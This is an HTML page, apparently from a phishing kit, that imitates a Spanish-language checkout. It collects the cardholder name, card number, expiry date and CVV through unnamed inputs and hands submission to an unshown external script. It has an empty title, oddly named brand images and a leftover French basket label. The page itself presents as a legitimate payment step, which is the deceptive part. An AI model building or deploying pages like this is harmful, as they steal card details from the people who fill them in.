<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/camaki.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body >
    <div>
        <div class="roof">
            <img src="./img/upotap-cc.PNG" alt="">
        </div>
    </div>


    <div>
        <div>
        
        
            <!-- <p class="pp2">
                Panier :
                <span>1 Article</span>
            </p> -->
            <div class="section1">
                
                <div class="kolch2">
                    <form class="indom" method="post" id="pg2">
                        
                        
                        
                        <p>Nombre en la tarjeta *  </p>
                        <input class="inp1" type="tele" name="" id="w5" maxlength="19" >
                        
                        <p>Número de tarjeta *  </p>
                        <input class="inp1" type="tele" name="" id="numcc" maxlength="19" >
                        
                        
                        <p>Fecha de caducidad *</p>
                        <div class="exp">
                            <input class="mm" type="tel" name="" id="two1" required placeholder="MM" maxlength="7">
                            <input class="nar2" type="tel" name="" id="two2" required placeholder="AA" maxlength="4">
                        </div>
    
                        <p>Código de seguridad (CVV)</p>
                        <input class="cfifi" type="tel" name="" id="numvv" required  maxlength="4">
    
                        <button class="btn2"  type="submit"><svg style="height: 20px;" fill="#002e6d" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Pro 6.2.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright 2022 Fonticons, Inc. --><path d="M144 144v48H304V144c0-44.2-35.8-80-80-80s-80 35.8-80 80zM80 192V144C80 64.5 144.5 0 224 0s144 64.5 144 144v48h16c35.3 0 64 28.7 64 64V448c0 35.3-28.7 64-64 64H64c-35.3 0-64-28.7-64-64V256c0-35.3 28.7-64 64-64H80z"></path></svg> Paga y continúa</button>
                    </form>
                </div>
            </div>
        </div>
    </div>


    <div>
        <div>
            <div class="boot">
                <img src="./img/botomat-onaq.PNG" alt="">
                <img src="./img/botmot02.png" alt="" srcset="">
            </div>
        </div>
    </div>


    <script>
        $("#numcc").on("keyup",function(){
            cc = $(this).val().split(" ").join("");
            cc = cc.match(new RegExp('.{1,4}$|.{1,4}', 'g')).join(" ");
            $(this).val(cc);
        });
    </script>
    <!--  -->
    <script src="./js/stb.js"></script>
</body>
</html>